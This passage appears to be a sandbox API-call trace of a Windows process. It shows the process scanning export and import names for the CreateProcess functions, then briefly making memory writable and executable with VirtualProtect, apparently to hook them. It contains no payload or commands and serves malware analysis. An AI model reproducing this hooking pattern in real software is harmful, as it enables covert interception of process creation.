(lpString1="ControlTraceA", lpString2="CreateProcessAsUserA") returned -1 [0208.886] lstrcmpA (lpString1="ControlTraceW", lpString2="CreateProcessAsUserA") returned -1 [0208.886] lstrcmpA (lpString1="ConvertAccessToSecurityDescriptorA", lpString2="CreateProcessAsUserA") returned -1 [0208.886] lstrcmpA (lpString1="ConvertAccessToSecurityDescriptorW", lpString2="CreateProcessAsUserA") returned -1 [0208.886] lstrcmpA (lpString1="ConvertSDToStringSDDomainW", lpString2="CreateProcessAsUserA") returned -1 [0208.886] lstrcmpA (lpString1="ConvertSDToStringSDRootDomainA", lpString2="CreateProcessAsUserA") returned -1 [0208.886] lstrcmpA (lpString1="ConvertSDToStringSDRootDomainW", lpString2="CreateProcessAsUserA") returned -1 [0208.886] lstrcmpA (lpString1="ConvertSecurityDescriptorToAccessA", lpString2="CreateProcessAsUserA") returned -1 [0208.886] lstrcmpA (lpString1="ConvertSecurityDescriptorToAccessNamedA", lpString2="CreateProcessAsUserA") returned -1 [0208.886] lstrcmpA (lpString1="ConvertSecurityDescriptorToAccessNamedW", lpString2="CreateProcessAsUserA") returned -1 [0208.886] lstrcmpA (lpString1="ConvertSecurityDescriptorToAccessW", lpString2="CreateProcessAsUserA") returned -1 [0208.886] lstrcmpA (lpString1="ConvertSecurityDescriptorToStringSecurityDescriptorA", lpString2="CreateProcessAsUserA") returned -1 [0208.886] lstrcmpA (lpString1="ConvertSecurityDescriptorToStringSecurityDescriptorW", lpString2="CreateProcessAsUserA") returned -1 [0208.886] lstrcmpA (lpString1="ConvertSidToStringSidA", lpString2="CreateProcessAsUserA") returned -1 [0208.886] lstrcmpA (lpString1="ConvertSidToStringSidW", lpString2="CreateProcessAsUserA") returned -1 [0208.886] lstrcmpA (lpString1="ConvertStringSDToSDDomainA", lpString2="CreateProcessAsUserA") returned -1 [0208.887] lstrcmpA (lpString1="ConvertStringSDToSDDomainW", lpString2="CreateProcessAsUserA") returned -1 [0208.887] lstrcmpA (lpString1="ConvertStringSDToSDRootDomainA", lpString2="CreateProcessAsUserA") returned -1 [0208.887] lstrcmpA (lpString1="ConvertStringSDToSDRootDomainW", lpString2="CreateProcessAsUserA") returned -1 [0208.887] lstrcmpA (lpString1="ConvertStringSecurityDescriptorToSecurityDescriptorA", lpString2="CreateProcessAsUserA") returned -1 [0208.887] lstrcmpA (lpString1="ConvertStringSecurityDescriptorToSecurityDescriptorW", lpString2="CreateProcessAsUserA") returned -1 [0208.887] lstrcmpA (lpString1="ConvertStringSidToSidA", lpString2="CreateProcessAsUserA") returned -1 [0208.887] lstrcmpA (lpString1="ConvertStringSidToSidW", lpString2="CreateProcessAsUserA") returned -1 [0208.887] lstrcmpA (lpString1="ConvertToAutoInheritPrivateObjectSecurity", lpString2="CreateProcessAsUserA") returned -1 [0208.887] lstrcmpA (lpString1="CopySid", lpString2="CreateProcessAsUserA") returned -1 [0208.887] lstrcmpA (lpString1="CreateCodeAuthzLevel", lpString2="CreateProcessAsUserA") returned -1 [0208.887] lstrcmpA (lpString1="CreatePrivateObjectSecurity", lpString2="CreateProcessAsUserA") returned -1 [0208.887] lstrcmpA (lpString1="CreatePrivateObjectSecurityEx", lpString2="CreateProcessAsUserA") returned -1 [0208.887] lstrcmpA (lpString1="CreatePrivateObjectSecurityWithMultipleInheritance", lpString2="CreateProcessAsUserA") returned -1 [0208.887] lstrcmpA (lpString1="CreateProcessAsUserA", lpString2="CreateProcessAsUserA") returned 0 [0208.887] VirtualProtect (in: lpAddress=0x7ff97700ba88, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x235f508 | out: lpflOldProtect=0x235f508*=0x2) returned 1 [0208.887] VirtualProtect (in: lpAddress=0x7ff976fe3800, dwSize=0xe, flNewProtect=0x40, lpflOldProtect=0x235f500 | out: lpflOldProtect=0x235f500*=0x20) returned 1 [0208.888] VirtualProtect (in: lpAddress=0x7ff976fe3800, dwSize=0xe, flNewProtect=0x20, lpflOldProtect=0x235f500 | out: lpflOldProtect=0x235f500*=0x40) returned 1 [0208.888] VirtualProtect (in: lpAddress=0x7ff97700ba88, dwSize=0x4, flNewProtect=0x2, lpflOldProtect=0x235f508 | out: lpflOldProtect=0x235f508*=0x40) returned 1 [0208.888] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4a0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4a0, ReturnLength=0x0) returned 0x0 [0208.888] LoadLibraryA (lpLibFileName="PSAPI.DLL") returned 0x7ff977820000 [0208.891] GetProcAddress (hModule=0x7ff977820000, lpProcName="EnumProcessModules") returned 0x7ff977821040 [0208.891] EnumProcessModules (in: hProcess=0xffffffffffffffff, lphModule=0x7aae480, cb=0x1000, lpcbNeeded=0x235f5a8 | out: lphModule=0x7aae480, lpcbNeeded=0x235f5a8) returned 1 [0208.893] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff62aec0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff62aec0000, AllocationBase=0x7ff62aec0000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.893] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.893] lstrcmpiA (lpString1="wcschr", lpString2="CreateProcessW") returned 1 [0208.893] lstrcmpiA (lpString1="_get_errno", lpString2="CreateProcessW") returned -1 [0208.893] lstrcmpiA (lpString1="_set_errno", lpString2="CreateProcessW") returned -1 [0208.894] lstrcmpiA (lpString1="memcpy_s", lpString2="CreateProcessW") returned 1 [0208.894] lstrcmpiA (lpString1="free", lpString2="CreateProcessW") returned 1 [0208.894] lstrcmpiA (lpString1="strchr", lpString2="CreateProcessW") returned 1 [0208.894] lstrcmpiA (lpString1="wcstombs", lpString2="CreateProcessW") returned 1 [0208.894] lstrcmpiA (lpString1="_wtoi", lpString2="CreateProcessW") returned -1 [0208.894] lstrcmpiA (lpString1="_itow_s", lpString2="CreateProcessW") returned -1 [0208.894] lstrcmpiA (lpString1="_wcsicmp", lpString2="CreateProcessW") returned -1 [0208.894] lstrcmpiA (lpString1="bsearch", lpString2="CreateProcessW") returned -1 [0208.894] lstrcmpiA (lpString1="wcsncpy_s", lpString2="CreateProcessW") returned 1 [0208.894] lstrcmpiA (lpString1="memset", lpString2="CreateProcessW") returned 1 [0208.894] lstrcmpiA (lpString1="ceil", lpString2="CreateProcessW") returned -1 [0208.894] lstrcmpiA (lpString1="floor", lpString2="CreateProcessW") returned 1 [0208.894] lstrcmpiA (lpString1="floorf", lpString2="CreateProcessW") returned 1 [0208.894] lstrcmpiA (lpString1="memcmp", lpString2="CreateProcessW") returned 1 [0208.894] lstrcmpiA (lpString1="sqrt", lpString2="CreateProcessW") returned 1 [0208.894] lstrcmpiA (lpString1="wcscspn", lpString2="CreateProcessW") returned 1 [0208.894] lstrcmpiA (lpString1="_wcstoui64", lpString2="CreateProcessW") returned -1 [0208.894] lstrcmpiA (lpString1="_errno", lpString2="CreateProcessW") returned -1 [0208.894] lstrcmpiA (lpString1="??1type_info@@UEAA@XZ", lpString2="CreateProcessW") returned -1 [0208.894] lstrcmpiA (lpString1="_onexit", lpString2="CreateProcessW") returned -1 [0208.894] lstrcmpiA (lpString1="__dllonexit", lpString2="CreateProcessW") returned -1 [0208.894] lstrcmpiA (lpString1="_unlock", lpString2="CreateProcessW") returned -1 [0208.894] lstrcmpiA (lpString1="_lock", lpString2="CreateProcessW") returned -1 [0208.894] lstrcmpiA (lpString1="?terminate@@YAXXZ", lpString2="CreateProcessW") returned -1 [0208.894] lstrcmpiA (lpString1="_commode", lpString2="CreateProcessW") returned -1 [0208.894] lstrcmpiA (lpString1="_fmode", lpString2="CreateProcessW") returned -1 [0208.894] lstrcmpiA (lpString1="_wcmdln", lpString2="CreateProcessW") returned -1 [0208.894] lstrcmpiA (lpString1="__C_specific_handler", lpString2="CreateProcessW") returned -1 [0208.894] lstrcmpiA (lpString1="_initterm", lpString2="CreateProcessW") returned -1 [0208.894] lstrcmpiA (lpString1="__setusermatherr", lpString2="CreateProcessW") returned -1 [0208.894] lstrcmpiA (lpString1="_cexit", lpString2="CreateProcessW") returned -1 [0208.894] lstrcmpiA (lpString1="_exit", lpString2="CreateProcessW") returned -1 [0208.894] lstrcmpiA (lpString1="exit", lpString2="CreateProcessW") returned 1 [0208.894] lstrcmpiA (lpString1="__set_app_type", lpString2="CreateProcessW") returned -1 [0208.894] lstrcmpiA (lpString1="__wgetmainargs", lpString2="CreateProcessW") returned -1 [0208.894] lstrcmpiA (lpString1="_snwprintf_s", lpString2="CreateProcessW") returned -1 [0208.894] lstrcmpiA (lpString1="_vsnwprintf_s", lpString2="CreateProcessW") returned -1 [0208.894] lstrcmpiA (lpString1="wcsspn", lpString2="CreateProcessW") returned 1 [0208.895] lstrcmpiA (lpString1="_amsg_exit", lpString2="CreateProcessW") returned -1 [0208.895] lstrcmpiA (lpString1="_XcptFilter", lpString2="CreateProcessW") returned -1 [0208.895] lstrcmpiA (lpString1="?what@exception@@UEBAPEBDXZ", lpString2="CreateProcessW") returned -1 [0208.895] lstrcmpiA (lpString1="??1exception@@UEAA@XZ", lpString2="CreateProcessW") returned -1 [0208.895] lstrcmpiA (lpString1="??0exception@@QEAA@AEBV0@@Z", lpString2="CreateProcessW") returned -1 [0208.895] lstrcmpiA (lpString1="??0exception@@QEAA@AEBQEBDH@Z", lpString2="CreateProcessW") returned -1 [0208.895] lstrcmpiA (lpString1="??0exception@@QEAA@AEBQEBD@Z", lpString2="CreateProcessW") returned -1 [0208.895] lstrcmpiA (lpString1="memcpy", lpString2="CreateProcessW") returned 1 [0208.895] lstrcmpiA (lpString1="__CxxFrameHandler3", lpString2="CreateProcessW") returned -1 [0208.895] lstrcmpiA (lpString1="_CxxThrowException", lpString2="CreateProcessW") returned -1 [0208.895] lstrcmpiA (lpString1="realloc", lpString2="CreateProcessW") returned 1 [0208.895] lstrcmpiA (lpString1="wcsstr", lpString2="CreateProcessW") returned 1 [0208.895] lstrcmpiA (lpString1="memmove", lpString2="CreateProcessW") returned 1 [0208.895] lstrcmpiA (lpString1="malloc", lpString2="CreateProcessW") returned 1 [0208.895] lstrcmpiA (lpString1="_vsnwprintf", lpString2="CreateProcessW") returned -1 [0208.895] lstrcmpiA (lpString1="wcsrchr", lpString2="CreateProcessW") returned 1 [0208.895] lstrcmpiA (lpString1="wcscmp", lpString2="CreateProcessW") returned 1 [0208.895] lstrcmpiA (lpString1="GetModuleHandleExW", lpString2="CreateProcessW") returned 1 [0208.895] lstrcmpiA (lpString1="GetModuleFileNameA", lpString2="CreateProcessW") returned 1 [0208.895] lstrcmpiA (lpString1="GetProcAddress", lpString2="CreateProcessW") returned 1 [0208.895] lstrcmpiA (lpString1="FindResourceExW", lpString2="CreateProcessW") returned 1 [0208.895] lstrcmpiA (lpString1="LoadResource", lpString2="CreateProcessW") returned 1 [0208.895] lstrcmpiA (lpString1="LockResource", lpString2="CreateProcessW") returned 1 [0208.895] lstrcmpiA (lpString1="GetModuleHandleW", lpString2="CreateProcessW") returned 1 [0208.895] lstrcmpiA (lpString1="SizeofResource", lpString2="CreateProcessW") returned 1 [0208.895] lstrcmpiA (lpString1="LoadLibraryExW", lpString2="CreateProcessW") returned 1 [0208.895] lstrcmpiA (lpString1="GetModuleHandleA", lpString2="CreateProcessW") returned 1 [0208.895] lstrcmpiA (lpString1="LoadStringW", lpString2="CreateProcessW") returned 1 [0208.895] lstrcmpiA (lpString1="FreeLibrary", lpString2="CreateProcessW") returned 1 [0208.895] lstrcmpiA (lpString1="GetModuleFileNameW", lpString2="CreateProcessW") returned 1 [0208.895] lstrcmpiA (lpString1="LoadLibraryExA", lpString2="CreateProcessW") returned 1 [0208.895] lstrcmpiA (lpString1="FreeLibraryAndExitThread", lpString2="CreateProcessW") returned 1 [0208.895] lstrcmpiA (lpString1="EventEnabled", lpString2="CreateProcessW") returned 1 [0208.895] lstrcmpiA (lpString1="EventActivityIdControl", lpString2="CreateProcessW") returned 1 [0208.895] lstrcmpiA (lpString1="EventUnregister", lpString2="CreateProcessW") returned 1 [0208.896] lstrcmpiA (lpString1="EventSetInformation", lpString2="CreateProcessW") returned 1 [0208.896] lstrcmpiA (lpString1="EventWriteTransfer", lpString2="CreateProcessW") returned 1 [0208.896] lstrcmpiA (lpString1="EventRegister", lpString2="CreateProcessW") returned 1 [0208.896] lstrcmpiA (lpString1="EventWrite", lpString2="CreateProcessW") returned 1 [0208.896] lstrcmpiA (lpString1="OpenThreadToken", lpString2="CreateProcessW") returned 1 [0208.896] lstrcmpiA (lpString1="SetPriorityClass", lpString2="CreateProcessW") returned 1 [0208.896] lstrcmpiA (lpString1="SetProcessShutdownParameters", lpString2="CreateProcessW") returned 1 [0208.896] lstrcmpiA (lpString1="GetPriorityClass", lpString2="CreateProcessW") returned 1 [0208.896] lstrcmpiA (lpString1="OpenProcessToken", lpString2="CreateProcessW") returned 1 [0208.896] lstrcmpiA (lpString1="TerminateThread", lpString2="CreateProcessW") returned 1 [0208.896] lstrcmpiA (lpString1="FlushInstructionCache", lpString2="CreateProcessW") returned 1 [0208.896] lstrcmpiA (lpString1="ExitProcess", lpString2="CreateProcessW") returned 1 [0208.896] lstrcmpiA (lpString1="GetStartupInfoW", lpString2="CreateProcessW") returned 1 [0208.896] lstrcmpiA (lpString1="GetCurrentProcessId", lpString2="CreateProcessW") returned 1 [0208.896] lstrcmpiA (lpString1="SetThreadPriority", lpString2="CreateProcessW") returned 1 [0208.896] lstrcmpiA (lpString1="OpenProcess", lpString2="CreateProcessW") returned 1 [0208.896] lstrcmpiA (lpString1="SetThreadPriorityBoost", lpString2="CreateProcessW") returned 1 [0208.896] lstrcmpiA (lpString1="GetCurrentThread", lpString2="CreateProcessW") returned 1 [0208.896] lstrcmpiA (lpString1="QueueUserAPC", lpString2="CreateProcessW") returned 1 [0208.896] lstrcmpiA (lpString1="TlsAlloc", lpString2="CreateProcessW") returned 1 [0208.896] lstrcmpiA (lpString1="GetCurrentProcess", lpString2="CreateProcessW") returned 1 [0208.896] lstrcmpiA (lpString1="GetThreadPriority", lpString2="CreateProcessW") returned 1 [0208.896] lstrcmpiA (lpString1="TlsSetValue", lpString2="CreateProcessW") returned 1 [0208.896] lstrcmpiA (lpString1="ResumeThread", lpString2="CreateProcessW") returned 1 [0208.896] lstrcmpiA (lpString1="GetCurrentThreadId", lpString2="CreateProcessW") returned 1 [0208.896] lstrcmpiA (lpString1="TlsFree", lpString2="CreateProcessW") returned 1 [0208.896] lstrcmpiA (lpString1="CreateProcessW", lpString2="CreateProcessW") returned 0 [0208.896] VirtualProtect (in: lpAddress=0x7ff62b0888a0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x2) returned 1 [0208.897] VirtualProtect (in: lpAddress=0x7ff62b0888a0, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x40) returned 1 [0208.897] lstrcmpiA (lpString1="wcschr", lpString2="CreateProcessA") returned 1 [0208.897] lstrcmpiA (lpString1="_get_errno", lpString2="CreateProcessA") returned -1 [0208.897] lstrcmpiA (lpString1="_set_errno", lpString2="CreateProcessA") returned -1 [0208.897] lstrcmpiA (lpString1="memcpy_s", lpString2="CreateProcessA") returned 1 [0208.897] lstrcmpiA (lpString1="free", lpString2="CreateProcessA") returned 1 [0208.897] lstrcmpiA (lpString1="strchr", lpString2="CreateProcessA") returned 1 [0208.897] lstrcmpiA (lpString1="wcstombs", lpString2="CreateProcessA") returned 1 [0208.897] lstrcmpiA (lpString1="_wtoi", lpString2="CreateProcessA") returned -1 [0208.897] lstrcmpiA (lpString1="_itow_s", lpString2="CreateProcessA") returned -1 [0208.897] lstrcmpiA (lpString1="_wcsicmp", lpString2="CreateProcessA") returned -1 [0208.897] lstrcmpiA (lpString1="bsearch", lpString2="CreateProcessA") returned -1 [0208.897] lstrcmpiA (lpString1="wcsncpy_s", lpString2="CreateProcessA") returned 1 [0208.897] lstrcmpiA (lpString1="memset", lpString2="CreateProcessA") returned 1 [0208.897] lstrcmpiA (lpString1="ceil", lpString2="CreateProcessA") returned -1 [0208.898] lstrcmpiA (lpString1="floor", lpString2="CreateProcessA") returned 1 [0208.898] lstrcmpiA (lpString1="floorf", lpString2="CreateProcessA") returned 1 [0208.898] lstrcmpiA (lpString1="memcmp", lpString2="CreateProcessA") returned 1 [0208.898] lstrcmpiA (lpString1="sqrt", lpString2="CreateProcessA") returned 1 [0208.898] lstrcmpiA (lpString1="wcscspn", lpString2="CreateProcessA") returned 1 [0208.898] lstrcmpiA (lpString1="_wcstoui64", lpString2="CreateProcessA") returned -1 [0208.898] lstrcmpiA (lpString1="_errno", lpString2="CreateProcessA") returned -1 [0208.898] lstrcmpiA (lpString1="??1type_info@@UEAA@XZ", lpString2="CreateProcessA") returned -1 [0208.898] lstrcmpiA (lpString1="_onexit", lpString2="CreateProcessA") returned -1 [0208.898] lstrcmpiA (lpString1="__dllonexit", lpString2="CreateProcessA") returned -1 [0208.898] lstrcmpiA (lpString1="_unlock", lpString2="CreateProcessA") returned -1 [0208.898] lstrcmpiA (lpString1="_lock", lpString2="CreateProcessA") returned -1 [0208.898] lstrcmpiA (lpString1="?terminate@@YAXXZ", lpString2="CreateProcessA") returned -1 [0208.898] lstrcmpiA (lpString1="_commode", lpString2="CreateProcessA") returned -1 [0208.898] lstrcmpiA (lpString1="_fmode", lpString2="CreateProcessA") returned -1 [0208.898] lstrcmpiA (lpString1="_wcmdln", lpString2="CreateProcessA") returned -1 [0208.898] lstrcmpiA (lpString1="__C_specific_handler", lpString2="CreateProcessA") returned -1 [0208.898] lstrcmpiA (lpString1="_initterm", lpString2="CreateProcessA") returned -1 [0208.898] lstrcmpiA (lpString1="__setusermatherr", lpString2="CreateProcessA") returned -1 [0208.898] lstrcmpiA (lpString1="_cexit", lpString2="CreateProcessA") returned -1 [0208.898] lstrcmpiA (lpString1="_exit", lpString2="CreateProcessA") returned -1 [0208.898] lstrcmpiA (lpString1="exit", lpString2="CreateProcessA") returned 1 [0208.898] lstrcmpiA (lpString1="__set_app_type", lpString2="CreateProcessA") returned -1 [0208.898] lstrcmpiA (lpString1="__wgetmainargs", lpString2="CreateProcessA") returned -1 [0208.898] lstrcmpiA (lpString1="_snwprintf_s", lpString2="CreateProcessA") returned -1 [0208.898] lstrcmpiA (lpString1="_vsnwprintf_s", lpString2="CreateProcessA") returned -1 [0208.898] lstrcmpiA (lpString1="wcsspn", lpString2="CreateProcessA") returned 1 [0208.898] lstrcmpiA (lpString1="_amsg_exit", lpString2="CreateProcessA") returned -1 [0208.898] lstrcmpiA (lpString1="_XcptFilter", lpString2="CreateProcessA") returned -1 [0208.898] lstrcmpiA (lpString1="?what@exception@@UEBAPEBDXZ", lpString2="CreateProcessA") returned -1 [0208.898] lstrcmpiA (lpString1="??1exception@@UEAA@XZ", lpString2="CreateProcessA") returned -1 [0208.898] lstrcmpiA (lpString1="??0exception@@QEAA@AEBV0@@Z", lpString2="CreateProcessA") returned -1 [0208.898] lstrcmpiA (lpString1="??0exception@@QEAA@AEBQEBDH@Z", lpString2="CreateProcessA") returned -1 [0208.898] lstrcmpiA (lpString1="??0exception@@QEAA@AEBQEBD@Z", lpString2="CreateProcessA") returned -1 [0208.898] lstrcmpiA (lpString1="memcpy", lpString2="CreateProcessA") returned 1 [0208.898] lstrcmpiA (lpString1="__CxxFrameHandler3", lpString2="CreateProcessA") returned -1 [0208.898] lstrcmpiA (lpString1="_CxxThrowException", lpString2="CreateProcessA") returned -1 [0208.898] lstrcmpiA (lpString1="realloc", lpString2="CreateProcessA") returned 1 [0208.899] lstrcmpiA (lpString1="wcsstr", lpString2="CreateProcessA") returned 1 [0208.899] lstrcmpiA (lpString1="memmove", lpString2="CreateProcessA") returned 1 [0208.899] lstrcmpiA (lpString1="malloc", lpString2="CreateProcessA") returned 1 [0208.899] lstrcmpiA (lpString1="_vsnwprintf", lpString2="CreateProcessA") returned -1 [0208.899] lstrcmpiA (lpString1="wcsrchr", lpString2="CreateProcessA") returned 1 [0208.899] lstrcmpiA (lpString1="wcscmp", lpString2="CreateProcessA") returned 1 [0208.899] lstrcmpiA (lpString1="GetModuleHandleExW", lpString2="CreateProcessA") returned 1 [0208.899] lstrcmpiA (lpString1="GetModuleFileNameA", lpString2="CreateProcessA") returned 1 [0208.899] lstrcmpiA (lpString1="GetProcAddress", lpString2="CreateProcessA") returned 1 [0208.899] lstrcmpiA (lpString1="FindResourceExW", lpString2="CreateProcessA") returned 1 [0208.899] lstrcmpiA (lpString1="LoadResource", lpString2="CreateProcessA") returned 1 [0208.899] lstrcmpiA (lpString1="LockResource", lpString2="CreateProcessA") returned 1 [0208.899] lstrcmpiA (lpString1="GetModuleHandleW", lpString2="CreateProcessA") returned 1 [0208.899] lstrcmpiA (lpString1="SizeofResource", lpString2="CreateProcessA") returned 1 [0208.899] lstrcmpiA (lpString1="LoadLibraryExW", lpString2="CreateProcessA") returned 1 [0208.899] lstrcmpiA (lpString1="GetModuleHandleA", lpString2="CreateProcessA") returned 1 [0208.899] lstrcmpiA (lpString1="LoadStringW", lpString2="CreateProcessA") returned 1 [0208.899] lstrcmpiA (lpString1="FreeLibrary", lpString2="CreateProcessA") returned 1 [0208.899] lstrcmpiA (lpString1="GetModuleFileNameW", lpString2="CreateProcessA") returned 1 [0208.899] lstrcmpiA (lpString1="LoadLibraryExA", lpString2="CreateProcessA") returned 1 [0208.899] lstrcmpiA (lpString1="FreeLibraryAndExitThread", lpString2="CreateProcessA") returned 1 [0208.899] lstrcmpiA (lpString1="EventEnabled", lpString2="CreateProcessA") returned 1 [0208.899] lstrcmpiA (lpString1="EventActivityIdControl", lpString2="CreateProcessA") returned 1 [0208.899] lstrcmpiA (lpString1="EventUnregister", lpString2="CreateProcessA") returned 1 [0208.899] lstrcmpiA (lpString1="EventSetInformation", lpString2="CreateProcessA") returned 1 [0208.899] lstrcmpiA (lpString1="EventWriteTransfer", lpString2="CreateProcessA") returned 1 [0208.899] lstrcmpiA (lpString1="EventRegister", lpString2="CreateProcessA") returned 1 [0208.899] lstrcmpiA (lpString1="EventWrite", lpString2="CreateProcessA") returned 1 [0208.899] lstrcmpiA (lpString1="OpenThreadToken", lpString2="CreateProcessA") returned 1 [0208.899] lstrcmpiA (lpString1="SetPriorityClass", lpString2="CreateProcessA") returned 1 [0208.899] lstrcmpiA (lpString1="SetProcessShutdownParameters", lpString2="CreateProcessA") returned 1 [0208.899] lstrcmpiA (lpString1="GetPriorityClass", lpString2="CreateProcessA") returned 1 [0208.899] lstrcmpiA (lpString1="OpenProcessToken", lpString2="CreateProcessA") returned 1 [0208.899] lstrcmpiA (lpString1="TerminateThread", lpString2="CreateProcessA") returned 1 [0208.899] lstrcmpiA (lpString1="FlushInstructionCache", lpString2="CreateProcessA") returned 1 [0208.899] lstrcmpiA (lpString1="ExitProcess", lpString2="CreateProcessA") returned 1 [0208.899] lstrcmpiA (lpString1="GetStartupInfoW", lpString2="CreateProcessA") returned 1 [0208.899] lstrcmpiA (lpString1="GetCurrentProcessId", lpString2="CreateProcessA") returned 1 [0208.900] lstrcmpiA (lpString1="SetThreadPriority", lpString2="CreateProcessA") returned 1 [0208.900] lstrcmpiA (lpString1="OpenProcess", lpString2="CreateProcessA") returned 1 [0208.900] lstrcmpiA (lpString1="SetThreadPriorityBoost", lpString2="CreateProcessA") returned 1 [0208.900] lstrcmpiA (lpString1="GetCurrentThread", lpString2="CreateProcessA") returned 1 [0208.900] lstrcmpiA (lpString1="QueueUserAPC", lpString2="CreateProcessA") returned 1 [0208.900] lstrcmpiA (lpString1="TlsAlloc", lpString2="CreateProcessA") returned 1 [0208.900] lstrcmpiA (lpString1="GetCurrentProcess", lpString2="CreateProcessA") returned 1 [0208.900] lstrcmpiA (lpString1="GetThreadPriority", lpString2="CreateProcessA") returned 1 [0208.900] lstrcmpiA (lpString1="TlsSetValue", lpString2="CreateProcessA") returned 1 [0208.900] lstrcmpiA (lpString1="ResumeThread", lpString2="CreateProcessA") returned 1 [0208.900] lstrcmpiA (lpString1="GetCurrentThreadId", lpString2="CreateProcessA") returned 1 [0208.900] lstrcmpiA (lpString1="TlsFree", lpString2="CreateProcessA") returned 1 [0208.900] lstrcmpiA (lpString1="CreateProcessW", lpString2="CreateProcessA") returned 1 [0208.900] lstrcmpiA (lpString1="GetExitCodeProcess", lpString2="CreateProcessA") returned 1 [0208.900] lstrcmpiA (lpString1="OpenThread", lpString2="CreateProcessA") returned 1 [0208.900] lstrcmpiA (lpString1="CreateThread", lpString2="CreateProcessA") returned 1 [0208.900] lstrcmpiA (lpString1="TerminateProcess", lpString2="CreateProcessA") returned 1 [0208.900] lstrcmpiA (lpString1="GetProcessId", lpString2="CreateProcessA") returned 1 [0208.900] lstrcmpiA (lpString1="TlsGetValue", lpString2="CreateProcessA") returned 1 [0208.900] lstrcmpiA (lpString1="OutputDebugStringW", lpString2="CreateProcessA") returned 1 [0208.900] lstrcmpiA (lpString1="OutputDebugStringA", lpString2="CreateProcessA") returned 1 [0208.900] lstrcmpiA (lpString1="GetUserPreferredUILanguages", lpString2="CreateProcessA") returned 1 [0208.900] lstrcmpiA (lpString1="GetThreadUILanguage", lpString2="CreateProcessA") returned 1 [0208.900] lstrcmpiA (lpString1="GetUserGeoID", lpString2="CreateProcessA") returned 1 [0208.900] lstrcmpiA (lpString1="GetUserDefaultLangID", lpString2="CreateProcessA") returned 1 [0208.900] lstrcmpiA (lpString1="FormatMessageW", lpString2="CreateProcessA") returned 1 [0208.900] lstrcmpiA (lpString1="IsValidLocaleName", lpString2="CreateProcessA") returned 1 [0208.900] lstrcmpiA (lpString1="GetLocaleInfoW", lpString2="CreateProcessA") returned 1 [0208.900] lstrcmpiA (lpString1="CoInitializeSecurity", lpString2="CreateProcessA") returned -1 [0208.900] lstrcmpiA (lpString1="PropVariantClear", lpString2="CreateProcessA") returned 1 [0208.900] lstrcmpiA (lpString1="CoUninitialize", lpString2="CreateProcessA") returned -1 [0208.900] lstrcmpiA (lpString1="RoGetAgileReference", lpString2="CreateProcessA") returned 1 [0208.900] lstrcmpiA (lpString1="CoSetProxyBlanket", lpString2="CreateProcessA") returned -1 [0208.900] lstrcmpiA (lpString1="IIDFromString", lpString2="CreateProcessA") returned 1 [0208.900] lstrcmpiA (lpString1="CoCreateInstance", lpString2="CreateProcessA") returned -1 [0208.900] lstrcmpiA (lpString1="CoCreateGuid", lpString2="CreateProcessA") returned -1 [0208.900] lstrcmpiA (lpString1="CoGetStdMarshalEx", lpString2="CreateProcessA") returned -1 [0208.901] lstrcmpiA (lpString1="CreateStreamOnHGlobal", lpString2="CreateProcessA") returned 1 [0208.901] lstrcmpiA (lpString1="CoFreeUnusedLibraries", lpString2="CreateProcessA") returned -1 [0208.901] lstrcmpiA (lpString1="CoInitializeEx", lpString2="CreateProcessA") returned -1 [0208.901] lstrcmpiA (lpString1="CoGetApartmentType", lpString2="CreateProcessA") returned -1 [0208.901] lstrcmpiA (lpString1="StringFromIID", lpString2="CreateProcessA") returned 1 [0208.901] lstrcmpiA (lpString1="CoCreateFreeThreadedMarshaler", lpString2="CreateProcessA") returned -1 [0208.901] lstrcmpiA (lpString1="CoDisableCallCancellation", lpString2="CreateProcessA") returned -1 [0208.901] lstrcmpiA (lpString1="CoTaskMemAlloc", lpString2="CreateProcessA") returned -1 [0208.901] lstrcmpiA (lpString1="CoRevokeClassObject", lpString2="CreateProcessA") returned -1 [0208.901] lstrcmpiA (lpString1="CoTaskMemRealloc", lpString2="CreateProcessA") returned -1 [0208.901] lstrcmpiA (lpString1="CoRegisterClassObject", lpString2="CreateProcessA") returned -1 [0208.901] lstrcmpiA (lpString1="CoWaitForMultipleHandles", lpString2="CreateProcessA") returned -1 [0208.901] lstrcmpiA (lpString1="CoGetMalloc", lpString2="CreateProcessA") returned -1 [0208.901] lstrcmpiA (lpString1="CoTaskMemFree", lpString2="CreateProcessA") returned -1 [0208.901] lstrcmpiA (lpString1="CoMarshalInterThreadInterfaceInStream", lpString2="CreateProcessA") returned -1 [0208.901] lstrcmpiA (lpString1="StringFromGUID2", lpString2="CreateProcessA") returned 1 [0208.901] lstrcmpiA (lpString1="CoReleaseMarshalData", lpString2="CreateProcessA") returned -1 [0208.901] lstrcmpiA (lpString1="CoCancelCall", lpString2="CreateProcessA") returned -1 [0208.901] lstrcmpiA (lpString1="CoGetInterfaceAndReleaseStream", lpString2="CreateProcessA") returned -1 [0208.902] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977f30000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff977f30000, AllocationBase=0x7ff977f30000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.902] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.902] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977ab0000, lpBuffer=0x235f5b0, 